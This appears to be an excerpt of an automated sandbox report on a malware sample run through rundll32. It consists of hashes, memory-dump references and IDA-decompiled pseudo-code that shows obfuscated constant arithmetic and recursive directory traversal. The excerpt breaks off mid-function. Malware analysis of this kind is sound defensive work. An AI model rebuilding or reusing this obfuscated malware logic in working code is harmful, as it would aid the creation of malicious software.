                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %fj$(&$*@A$+R$TPX$_.$cw~6$r*N$zk.7
                                                                                                                      • API String ID: 0-4179132742
                                                                                                                      • Opcode ID: 88f8edaffffee8c8fa6649ea918b3d963a89421b38ee3ec17d0a9dd3bcd70659
                                                                                                                      • Instruction ID: 024c9b4a1ef9d72b0dfd2ee4df083907b394b452667d68de91e86fc67b9269ec
                                                                                                                      • Opcode Fuzzy Hash: 88f8edaffffee8c8fa6649ea918b3d963a89421b38ee3ec17d0a9dd3bcd70659
                                                                                                                      • Instruction Fuzzy Hash: 82F10D715083809FD7A9CF25D48AA4BFBE2FBC0748F10891DF59A8A260D7B19949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Version$ClipboardFormatRegister
                                                                                                                      • String ID: MSWHEEL_ROLLMSG
                                                                                                                      • API String ID: 2888461884-2485103130
                                                                                                                      • Opcode ID: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                      • Instruction ID: 7f315ad506f9c9b1e51aced78a2c78e4f88a242cc2e5f9aa46fc8e210ad3a912
                                                                                                                      • Opcode Fuzzy Hash: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                      • Instruction Fuzzy Hash: 94E0483680016396F3019764AD447A43AD4D7896D7F324037DE00C2551DA6609C3866D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 81%
                                                                                                                      			E00341950(void* __ecx, void* __edx, void* __eflags, signed int _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				unsigned int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				intOrPtr _v156;
                                                                                                                      				char _v176;
                                                                                                                      				short _v720;
                                                                                                                      				short _v722;
                                                                                                                      				char _v724;
                                                                                                                      				signed int _v768;
                                                                                                                      				char _v1288;
                                                                                                                      				char _v1808;
                                                                                                                      				void* _t335;
                                                                                                                      				signed int _t360;
                                                                                                                      				signed int _t362;
                                                                                                                      				intOrPtr _t371;
                                                                                                                      				void* _t373;
                                                                                                                      				signed int _t379;
                                                                                                                      				void* _t406;
                                                                                                                      				signed int _t418;
                                                                                                                      				signed int _t419;
                                                                                                                      				signed int _t420;
                                                                                                                      				signed int _t421;
                                                                                                                      				signed int _t422;
                                                                                                                      				signed int _t423;
                                                                                                                      				void* _t426;
                                                                                                                      				void* _t427;
                                                                                                                      
                                                                                                                      				_t371 = _a8;
                                                                                                                      				_push(_a20);
                                                                                                                      				if(__eflags == 0) {
                                                                                                                      					_push(_a16);
                                                                                                                      					_push(_a12);
                                                                                                                      					_push(_t371);
                                                                                                                      					_push(_a4);
                                                                                                                      					_push(__edx);
                                                                                                                      					_push(__ecx);
                                                                                                                      					E0034CF25(_t335);
                                                                                                                      					_v16 = 0x6f572e;
                                                                                                                      				}
                                                                                                                      				_t427 = _t426 + 0x1c;
                                                                                                                      				_v16 = _v16 >> 0xb;
                                                                                                                      				_v16 = _v16 + 0xd52f;
                                                                                                                      				_t373 = 0x80f983c;
                                                                                                                      				_v16 = _v16 ^ 0x3310f03a;
                                                                                                                      				_v16 = _v16 ^ 0x33101333;
                                                                                                                      				_v60 = 0xed71dd;
                                                                                                                      				_v60 = _v60 ^ 0x2497a453;
                                                                                                                      				_t418 = 0x26;
                                                                                                                      				_v60 = _v60 * 0x72;
                                                                                                                      				_v60 = _v60 ^ 0x3eb60fda;
                                                                                                                      				_v112 = 0xa5b0b2;
                                                                                                                      				_v112 = _v112 + 0x8954;
                                                                                                                      				_v112 = _v112 ^ 0x00ada628;
                                                                                                                      				_v108 = 0xe5587e;
                                                                                                                      				_v108 = _v108 << 9;
                                                                                                                      				_v108 = _v108 ^ 0xcab3bbf0;
                                                                                                                      				_v92 = 0x4845fb;
                                                                                                                      				_v92 = _v92 + 0x365f;
                                                                                                                      				_v92 = _v92 + 0xdd1a;
                                                                                                                      				_v92 = _v92 ^ 0x004e95c0;
                                                                                                                      				_v88 = 0xa51f24;
                                                                                                                      				_v88 = _v88 ^ 0x4dc3992d;
                                                                                                                      				_v88 = _v88 >> 9;
                                                                                                                      				_v88 = _v88 ^ 0x002183c7;
                                                                                                                      				_v28 = 0x92b1f2;
                                                                                                                      				_v28 = _v28 + 0xdb28;
                                                                                                                      				_v28 = _v28 ^ 0xc5c4fb2d;
                                                                                                                      				_v28 = _v28 + 0xffff07a3;
                                                                                                                      				_v28 = _v28 ^ 0xc5543e55;
                                                                                                                      				_v56 = 0x45fcf7;
                                                                                                                      				_v56 = _v56 ^ 0x18f8a820;
                                                                                                                      				_v56 = _v56 / _t418;
                                                                                                                      				_v56 = _v56 ^ 0x00a79737;
                                                                                                                      				_v72 = 0xd5567a;
                                                                                                                      				_v72 = _v72 ^ 0x96c46f64;
                                                                                                                      				_v72 = _v72 + 0x1123;
                                                                                                                      				_v72 = _v72 ^ 0x96131221;
                                                                                                                      				_v128 = 0xd7fcd2;
                                                                                                                      				_v128 = _v128 | 0x19fc7ba7;
                                                                                                                      				_v128 = _v128 ^ 0x19f2013f;
                                                                                                                      				_v36 = 0xb63dda;
                                                                                                                      				_v36 = _v36 | 0x57c3443c;
                                                                                                                      				_v36 = _v36 >> 0xf;
                                                                                                                      				_v36 = _v36 >> 2;
                                                                                                                      				_v36 = _v36 ^ 0x000375d9;
                                                                                                                      				_v120 = 0x9784e5;
                                                                                                                      				_v120 = _v120 ^ 0x5442b457;
                                                                                                                      				_v120 = _v120 ^ 0x54d2e3fe;
                                                                                                                      				_v152 = 0x86b47c;
                                                                                                                      				_v152 = _v152 | 0x1a648f0d;
                                                                                                                      				_v152 = _v152 ^ 0x1ae2f95e;
                                                                                                                      				_v104 = 0xe16033;
                                                                                                                      				_v104 = _v104 + 0xffff0503;
                                                                                                                      				_v104 = _v104 ^ 0x00e7872e;
                                                                                                                      				_v140 = 0x7ced29;
                                                                                                                      				_v140 = _v140 + 0x937a;
                                                                                                                      				_v140 = _v140 ^ 0x00718bd8;
                                                                                                                      				_v148 = 0xa848b7;
                                                                                                                      				_v148 = _v148 ^ 0xa8d47762;
                                                                                                                      				_v148 = _v148 ^ 0xa87b6210;
                                                                                                                      				_v124 = 0xc4055c;
                                                                                                                      				_v124 = _v124 << 5;
                                                                                                                      				_v124 = _v124 ^ 0x1882bddf;
                                                                                                                      				_v80 = 0x58e97;
                                                                                                                      				_t419 = 0x7c;
                                                                                                                      				_v80 = _v80 / _t419;
                                                                                                                      				_v80 = _v80 + 0xffff9366;
                                                                                                                      				_v80 = _v80 ^ 0xfffe01cd;
                                                                                                                      				_v48 = 0x77db93;
                                                                                                                      				_t420 = 0x3a;
                                                                                                                      				_v48 = _v48 / _t420;
                                                                                                                      				_v48 = _v48 + 0xffffa5b4;
                                                                                                                      				_v48 = _v48 >> 6;
                                                                                                                      				_v48 = _v48 ^ 0x00036e08;
                                                                                                                      				_v132 = 0x4854bc;
                                                                                                                      				_t421 = 0x4c;
                                                                                                                      				_v132 = _v132 * 0x24;
                                                                                                                      				_v132 = _v132 ^ 0x0a23127f;
                                                                                                                      				_v84 = 0x297997;
                                                                                                                      				_v84 = _v84 / _t421;
                                                                                                                      				_t422 = 0x45;
                                                                                                                      				_v84 = _v84 * 0x5e;
                                                                                                                      				_v84 = _v84 ^ 0x003e8360;
                                                                                                                      				_v24 = 0xba7a12;
                                                                                                                      				_v24 = _v24 << 9;
                                                                                                                      				_v24 = _v24 ^ 0x8e2fa782;
                                                                                                                      				_v24 = _v24 + 0xffffcaa3;
                                                                                                                      				_v24 = _v24 ^ 0xfad920cc;
                                                                                                                      				_v64 = 0xf87d94;
                                                                                                                      				_v64 = _v64 >> 3;
                                                                                                                      				_v64 = _v64 >> 4;
                                                                                                                      				_v64 = _v64 ^ 0x0002c2de;
                                                                                                                      				_v68 = 0x627eea;
                                                                                                                      				_v68 = _v68 >> 0xe;
                                                                                                                      				_v68 = _v68 | 0x4b478a8f;
                                                                                                                      				_v68 = _v68 ^ 0x4b4b50ae;
                                                                                                                      				_v32 = 0x4d9af3;
                                                                                                                      				_v32 = _v32 + 0xffff3fdf;
                                                                                                                      				_v32 = _v32 | 0x07023235;
                                                                                                                      				_v32 = _v32 ^ 0xa9cb8ace;
                                                                                                                      				_v32 = _v32 ^ 0xae825d6e;
                                                                                                                      				_v144 = 0x2c231c;
                                                                                                                      				_v144 = _v144 ^ 0x372f588c;
                                                                                                                      				_v144 = _v144 ^ 0x37050cc1;
                                                                                                                      				_v40 = 0xed36d5;
                                                                                                                      				_v40 = _v40 / _t422;
                                                                                                                      				_v40 = _v40 + 0xffff2e56;
                                                                                                                      				_v40 = _v40 * 0xd;
                                                                                                                      				_v40 = _v40 ^ 0x002f5a10;
                                                                                                                      				_v20 = 0xb226b9;
                                                                                                                      				_v20 = _v20 << 5;
                                                                                                                      				_v20 = _v20 ^ 0x7ec33512;
                                                                                                                      				_v20 = _v20 ^ 0x86eef9df;
                                                                                                                      				_v20 = _v20 ^ 0xee6f0a5e;
                                                                                                                      				_v76 = 0xa2d2;
                                                                                                                      				_v76 = _v76 + 0xffff2403;
                                                                                                                      				_v76 = _v76 + 0xffff5c56;
                                                                                                                      				_v76 = _v76 ^ 0xfff84be5;
                                                                                                                      				_v12 = 0x61529e;
                                                                                                                      				_v12 = _v12 + 0x826f;
                                                                                                                      				_v12 = _v12 | 0x315ab852;
                                                                                                                      				_v12 = _v12 >> 0xa;
                                                                                                                      				_v12 = _v12 ^ 0x0008d08d;
                                                                                                                      				_v136 = 0xbe89c0;
                                                                                                                      				_v136 = _v136 ^ 0x9f3b785a;
                                                                                                                      				_v136 = _v136 ^ 0x9f8a2ffd;
                                                                                                                      				_v116 = 0x9615af;
                                                                                                                      				_v116 = _v116 | 0x7dcb4113;
                                                                                                                      				_v116 = _v116 ^ 0x7dd5a359;
                                                                                                                      				_v100 = 0x787e8d;
                                                                                                                      				_t423 = 0xf;
                                                                                                                      				_v100 = _v100 * 0x78;
                                                                                                                      				_v100 = _v100 ^ 0x3874d75c;
                                                                                                                      				_v96 = 0xce992e;
                                                                                                                      				_v96 = _v96 << 9;
                                                                                                                      				_v96 = _v96 | 0x5045bce0;
                                                                                                                      				_v96 = _v96 ^ 0xdd755c45;
                                                                                                                      				_v52 = 0xe3c541;
                                                                                                                      				_t417 = _v100;
                                                                                                                      				_v52 = _v52 / _t423;
                                                                                                                      				_v52 = _v52 + 0xffff4fb9;
                                                                                                                      				_v52 = _v52 | 0x0dbfd8b3;
                                                                                                                      				_v52 = _v52 ^ 0x0db5e533;
                                                                                                                      				_v44 = 0xd3f0eb;
                                                                                                                      				_v44 = _v44 | 0x02fbd4da;
                                                                                                                      				_v44 = _v44 >> 6;
                                                                                                                      				_v44 = _v44 + 0xffffa89e;
                                                                                                                      				_v44 = _v44 ^ 0x000772a1;
                                                                                                                      				while(1) {
                                                                                                                      					L5:
                                                                                                                      					_t406 = 0x2e;
                                                                                                                      					L6:
                                                                                                                      					while(_t373 != 0xcf103a) {
                                                                                                                      						if(_t373 == 0x80f983c) {
                                                                                                                      							_v156 = _t371;
                                                                                                                      							_t373 = 0xcf103a;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t373 == 0x8bdeaee) {
                                                                                                                      							__eflags = _v768 & _v16;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_t360 = _a16( &_v768,  &_v176);
                                                                                                                      								asm("sbb ecx, ecx");
                                                                                                                      								_t379 =  ~_t360 & 0x01058edd;
                                                                                                                      								L13:
                                                                                                                      								_t373 = _t379 + 0xe9f3001;
                                                                                                                      								while(1) {
                                                                                                                      									L5:
                                                                                                                      									_t406 = 0x2e;
                                                                                                                      									goto L6;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								__eflags = _v724 - _t406;
                                                                                                                      								if(_v724 != _t406) {
                                                                                                                      									L22:
                                                                                                                      									__eflags = _a4;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_push(_v48);
                                                                                                                      										_push(_v80);
                                                                                                                      										_push(0x341264);
                                                                                                                      										E0034E7CE(E0034AB66(_v148, _v124, __eflags), __eflags, _v132, _t371, _v148, _v84, _v24, _v64, _v68,  &_v724);
                                                                                                                      										_t310 =  &_a12; // 0xee6f0a5e
                                                                                                                      										E00341950(_v32, _v144, __eflags, _a4,  &_v1808,  *_t310, _a16, _v40);
                                                                                                                      										_t427 = _t427 + 0x40;
                                                                                                                      										_t362 = E0034AE03(_v20, _v76, _v12, _t365);
                                                                                                                      										_t406 = 0x2e;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									__eflags = _v722;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										__eflags = _v722 - _t406;
                                                                                                                      										if(_v722 != _t406) {
                                                                                                                      											goto L22;
                                                                                                                      										} else {
                                                                                                                      											__eflags = _v720;
                                                                                                                      											if(__eflags != 0) {
                                                                                                                      												goto L22;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								_t373 = 0xfa4bede;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							L31:
                                                                                                                      						}
                                                                                                                      						if(_t373 != 0x8fff290) {
                                                                                                                      							if(_t373 == 0xe9f3001) {
                                                                                                                      								return E00358C35(_v100, _t417, _v96, _v52, _v44);
                                                                                                                      							}
                                                                                                                      							if(_t373 != 0xfa4bede) {
                                                                                                                      								L27:
                                                                                                                      								__eflags = _t373 - 0x71f77cc;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									return _t362;
                                                                                                                      								}
                                                                                                                      								goto L31;
                                                                                                                      							} else {
                                                                                                                      								_t277 =  &_v768; // 0x15f5595f
                                                                                                                      								_t362 = E0035F7FC(_v136, _t417, _v116, _t277);
                                                                                                                      								asm("sbb ecx, ecx");
                                                                                                                      								_t379 =  ~_t362 & 0xfa1ebaed;
                                                                                                                      								goto L13;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						_t362 = E0035BAEA( &_v1288, _v152,  &_v768, _v104, _v140);
                                                                                                                      						_t417 = _t362;
                                                                                                                      						_t427 = _t427 + 0xc;
                                                                                                                      						__eflags = _t362 - 0xffffffff;
                                                                                                                      						if(__eflags != 0) {
                                                                                                                      							_t373 = 0x8bdeaee;
                                                                                                                      							goto L5;
                                                                                                                      						}
                                                                                                                      						return _t362;
                                                                                                                      						goto L31;
                                                                                                                      					}
                                                                                                                      					_push(_v92);
                                                                                                                      					_push(_v108);
                                                                                                                      					_push(0x3412d4);
                                                                                                                      					E00343BF8(_v28, __eflags, E0034AB66(_v60, _v112, __eflags), _v56, _v72,  &_v1288, _t371);
                                                                                                                      					E0034AE03(_v128, _v36, _v120, _t353);
                                                                                                                      					_t427 = _t427 + 0x28;
                                                                                                                      					_t373 = 0x8fff290;
                                                                                                                      					_t406 = 0x2e;
                                                                                                                      					goto L27;
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x00341d2f
                                                                                                                      0x00341d36
                                                                                                                      0x00341d42
                                                                                                                      0x00341d45
                                                                                                                      0x00341d48
                                                                                                                      0x00341d4f
                                                                                                                      0x00341d56
                                                                                                                      0x00341d5d
                                                                                                                      0x00341d64
                                                                                                                      0x00341d6b
                                                                                                                      0x00341d6f
                                                                                                                      0x00341d76
                                                                                                                      0x00341d7d
                                                                                                                      0x00341d7d
                                                                                                                      0x00341d7f
                                                                                                                      0x00000000
                                                                                                                      0x00341d80
                                                                                                                      0x00341d92
                                                                                                                      0x00341f11
                                                                                                                      0x00341f17
                                                                                                                      0x00000000
                                                                                                                      0x00341f17
                                                                                                                      0x00341d9e
                                                                                                                      0x00341e2d
                                                                                                                      0x00341e33
                                                                                                                      0x00341efd
                                                                                                                      0x00341f04
                                                                                                                      0x00341f06
                                                                                                                      0x00341de9
                                                                                                                      0x00341de9
                                                                                                                      0x00341d7d
                                                                                                                      0x00341d7d
                                                                                                                      0x00341d7f
                                                                                                                      0x00000000
                                                                                                                      0x00341d7f
                                                                                                                      0x00341e39
                                                                                                                      0x00341e39
                                                                                                                      0x00341e40
                                                                                                                      0x00341e69
                                                                                                                      0x00341e69
                                                                                                                      0x00341e6d
                                                                                                                      0x00341e6f
                                                                                                                      0x00341e72
                                                                                                                      0x00341e7e
                                                                                                                      0x00341ead
                                                                                                                      0x00341ec7
                                                                                                                      0x00341ece
                                                                                                                      0x00341ed3
                                                                                                                      0x00341ee0
                                                                                                                      0x00341ee9
                                                                                                                      0x00341ee9
                                                                                                                      0x00341e42
                                                                                                                      0x00341e42
                                                                                                                      0x00341e4a
                                                                                                                      0x00341e4c
                                                                                                                      0x00341e53
                                                                                                                      0x00000000
                                                                                                                      0x00341e55
                                                                                                                      0x00341e55
                                                                                                                      0x00341e5d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00341e5d
                                                                                                                      0x00341e53
                                                                                                                      0x00341e4a
                                                                                                                      0x00341e5f
                                                                                                                      0x00000000
                                                                                                                      0x00341e5f
                                                                                                                      0x00000000
                                                                                                                      0x00341e33
                                                                                                                      0x00341daa
                                                                                                                      0x00341db2
                                                                                                                      0x00000000
                                                                                                                      0x00341f91
                                                                                                                      0x00341dbe
                                                                                                                      0x00341f70
                                                                                                                      0x00341f70
                                                                                                                      0x00341f76
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00341dc4
                                                                                                                      0x00341dc4
                                                                                                                      0x00341dd6
                                                                                                                      0x00341de1
                                                                                                                      0x00341de3
                                                                                                                      0x00000000
                                                                                                                      0x00341de3
                                                                                                                      0x00341dbe
                                                                                                                      0x00341e0d
                                                                                                                      0x00341e12
                                                                                                                      0x00341e14
                                                                                                                      0x00341e17
                                                                                                                      0x00341e1a
                                                                                                                      0x00341e20
                                                                                                                      0x00000000
                                                                                                                      0x00341e20
                                                                                                                      0x00341f9a
                                                                                                                      0x00000000
                                                                                                                      0x00341f9a
                                                                                                                      0x00341f21
                                                                                                                      0x00341f24
                                                                                                                      0x00341f2d
                                                                                                                      0x00341f51
                                                                                                                      0x00341f60
                                                                                                                      0x00341f65
                                                                                                                      0x00341f68
                                                                                                                      0x00341f6f
                                                                                                                      0x00000000
                                                                                                                      0x00341f6f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )|$.Wo$3`$^o$^o$_6$~X$~b
                                                                                                                      • API String ID: 0-3792513126
                                                                                                                      • Opcode ID: 3a74917b39747dd03601a38dd5ba4ec860f38957374910bb7bd73188a47e716f
                                                                                                                      • Instruction ID: aa3b6bca8d0a32514e43cb57393a4bb27a0cb669a7e6182c363d0da140d45b42
                                                                                                                      • Opcode Fuzzy Hash: 3a74917b39747dd03601a38dd5ba4ec860f38957374910bb7bd73188a47e716f
                                                                                                                      • Instruction Fuzzy Hash: 1B022272D0031DDBCF69CFA1C98A9EEBBB1FB04314F208159E516BA264D7B45A89CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E00352753(intOrPtr* __ecx) {
                                                                                                                      				char _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				intOrPtr _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				unsigned int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				intOrPtr* _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				unsigned int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				void* _t233;
                                                                                                                      				void* _t246;
                                                                                                                      				intOrPtr _t251;
                                                                                                                      				intOrPtr* _t252;
                                                                                                                      				void* _t253;
                                                                                                                      				signed int _t276;
                                                                                                                      				signed int _t277;
                                                                                                                      				signed int _t278;
                                                                                                                      				signed int _t279;
                                                                                                                      				intOrPtr _t280;
                                                                                                                      				void* _t281;
                                                                                                                      				void* _t285;
                                                                                                                      				signed int* _t286;
                                                                                                                      
                                                                                                                      				_t252 = __ecx;
                                                                                                                      				_t286 =  &_v232;
                                                                                                                      				_v172 = __ecx;
                                                                                                                      				_v136 = _v136 & 0x00000000;
                                                                                                                      				_v132 = _v132 & 0x00000000;
                                                                                                                      				_v140 = 0x217d3d;
                                                                                                                      				_v176 = 0xa426f0;
                                                                                                                      				_v176 = _v176 + 0xffffeb7e;
                                                                                                                      				_v176 = _v176 ^ 0xed8cc375;
                                                                                                                      				_v176 = _v176 ^ 0xed273dc0;
                                                                                                                      				_v220 = 0x3129fd;
                                                                                                                      				_v220 = _v220 + 0xffff6602;
                                                                                                                      				_v220 = _v220 + 0xfffff7e7;
                                                                                                                      				_v220 = _v220 >> 7;
                                                                                                                      				_v220 = _v220 ^ 0x000cbf49;
                                                                                                                      				_v212 = 0x151fab;
                                                                                                                      				_v212 = _v212 + 0x7196;
                                                                                                                      				_v212 = _v212 + 0xffffb9ae;
                                                                                                                      				_v212 = _v212 * 0x34;
                                                                                                                      				_t281 = 0x42637f8;
                                                                                                                      				_v212 = _v212 ^ 0x045541a5;
                                                                                                                      				_v148 = 0x54413c;
                                                                                                                      				_v148 = _v148 << 5;
                                                                                                                      				_v148 = _v148 ^ 0x0a8ad6a3;
                                                                                                                      				_v180 = 0x7a2f9c;
                                                                                                                      				_t276 = 0x52;
                                                                                                                      				_v180 = _v180 / _t276;
                                                                                                                      				_t277 = 0x3b;
                                                                                                                      				_v180 = _v180 * 0x43;
                                                                                                                      				_v180 = _v180 ^ 0x006060ee;
                                                                                                                      				_v144 = 0xa6782c;
                                                                                                                      				_v144 = _v144 + 0x5cb5;
                                                                                                                      				_v144 = _v144 ^ 0x00a488c7;
                                                                                                                      				_v228 = 0xec9e27;
                                                                                                                      				_v228 = _v228 >> 0x10;
                                                                                                                      				_v228 = _v228 * 0x57;
                                                                                                                      				_v228 = _v228 * 0x1a;
                                                                                                                      				_v228 = _v228 ^ 0x00091e6b;
                                                                                                                      				_v164 = 0xea1f52;
                                                                                                                      				_v164 = _v164 >> 6;
                                                                                                                      				_v164 = _v164 ^ 0x000e8f9b;
                                                                                                                      				_v168 = 0xaa796a;
                                                                                                                      				_v168 = _v168 << 9;
                                                                                                                      				_v168 = _v168 << 1;
                                                                                                                      				_v168 = _v168 ^ 0xa9e52790;
                                                                                                                      				_v232 = 0xe004fa;
                                                                                                                      				_v232 = _v232 >> 1;
                                                                                                                      				_v232 = _v232 ^ 0x9f2834c7;
                                                                                                                      				_v232 = _v232 << 7;
                                                                                                                      				_v232 = _v232 ^ 0xac158818;
                                                                                                                      				_v152 = 0x480a21;
                                                                                                                      				_v152 = _v152 >> 0xa;
                                                                                                                      				_v152 = _v152 ^ 0x00051613;
                                                                                                                      				_v192 = 0xe4ba17;
                                                                                                                      				_v192 = _v192 << 0xc;
                                                                                                                      				_v192 = _v192 + 0xffffee51;
                                                                                                                      				_v192 = _v192 * 0x26;
                                                                                                                      				_v192 = _v192 ^ 0x39f6006f;
                                                                                                                      				_v184 = 0xc14080;
                                                                                                                      				_v184 = _v184 + 0xffffa387;
                                                                                                                      				_v184 = _v184 / _t277;
                                                                                                                      				_v184 = _v184 ^ 0x000e78de;
                                                                                                                      				_v224 = 0xaafc1b;
                                                                                                                      				_v224 = _v224 << 8;
                                                                                                                      				_v224 = _v224 | 0xe68448c7;
                                                                                                                      				_v224 = _v224 + 0xffffb5fa;
                                                                                                                      				_v224 = _v224 ^ 0xeef4be14;
                                                                                                                      				_v208 = 0x4cb450;
                                                                                                                      				_v208 = _v208 | 0x41a678b0;
                                                                                                                      				_v208 = _v208 << 3;
                                                                                                                      				_v208 = _v208 + 0xffff1daa;
                                                                                                                      				_v208 = _v208 ^ 0x0f7f4e1f;
                                                                                                                      				_v156 = 0xa14600;
                                                                                                                      				_v156 = _v156 | 0x4ac9cb75;
                                                                                                                      				_v156 = _v156 ^ 0x4ae3fffe;
                                                                                                                      				_v200 = 0x80f125;
                                                                                                                      				_v200 = _v200 >> 6;
                                                                                                                      				_v200 = _v200 + 0xa5;
                                                                                                                      				_v200 = _v200 + 0x7126;
                                                                                                                      				_v200 = _v200 ^ 0x0003bf81;
                                                                                                                      				_v216 = 0xe3f3ee;
                                                                                                                      				_v216 = _v216 ^ 0x7171deb4;
                                                                                                                      				_v216 = _v216 ^ 0xe1685078;
                                                                                                                      				_v216 = _v216 >> 0xf;
                                                                                                                      				_v216 = _v216 ^ 0x000d439d;
                                                                                                                      				_v188 = 0x120f5;
                                                                                                                      				_v188 = _v188 + 0x596b;
                                                                                                                      				_t152 =  &_v188; // 0x596b
                                                                                                                      				_t278 = 0x32;
                                                                                                                      				_v188 =  *_t152 * 0x15;
                                                                                                                      				_t251 = _v172;
                                                                                                                      				_v188 = _v188 / _t278;
                                                                                                                      				_v188 = _v188 ^ 0x0000a7a1;
                                                                                                                      				_v160 = 0xd711e5;
                                                                                                                      				_v160 = _v160 | 0x35682df8;
                                                                                                                      				_v160 = _v160 ^ 0x35f32f5b;
                                                                                                                      				_v196 = 0xd874e4;
                                                                                                                      				_t279 = 0x21;
                                                                                                                      				_t280 = _v172;
                                                                                                                      				_v196 = _v196 / _t279;
                                                                                                                      				_v196 = _v196 + 0xffffe729;
                                                                                                                      				_v196 = _v196 + 0xffff68b4;
                                                                                                                      				_v196 = _v196 ^ 0x0004b076;
                                                                                                                      				_v204 = 0xe57f56;
                                                                                                                      				_v204 = _v204 ^ 0xa54f8096;
                                                                                                                      				_v204 = _v204 + 0xc8c2;
                                                                                                                      				_v204 = _v204 + 0xffffef22;
                                                                                                                      				_v204 = _v204 ^ 0xa5a4489c;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t233 = 0xe70005f;
                                                                                                                      					do {
                                                                                                                      						while(_t281 != 0x42637f8) {
